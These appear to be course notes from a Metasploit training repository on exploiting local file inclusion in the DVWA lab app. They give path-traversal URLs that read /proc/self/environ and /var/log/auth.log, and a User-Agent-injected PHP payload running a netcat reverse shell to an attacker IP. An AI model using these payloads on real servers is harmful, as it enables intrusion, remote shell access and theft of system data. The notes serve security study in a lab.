jensendarren/metasploit-course/README.md

 So there is a file in linux / unix systems that can be used to read all enviornment variables.
 The file is `/proc/self/environ`.
 We can pass that to the server and read the contents like so: `http://10.0.2.4/dvwa/vulnerabilities/fi/?page=../../../../../proc/self/environ`

 So with this we can intercept the request (using Burp) and change the 'User-Agent' header value to some php script that we want to execute.
 Basically we can set up a reverse connection (similar to the code execution example above) again using the following injected code into the header: `<? passthru('nc -e /bin/sh 10.0.2.15 8081');?>`

+## More local file explot examples

+Lets try and load a log file that shows login attempts to the server, which is the file `/var/log/auth.log`.
+So we change our url to be as follows: `http://10.0.2.4/dvwa/vulnerabilities/fi/?page=../../../../../var/log/auth.log`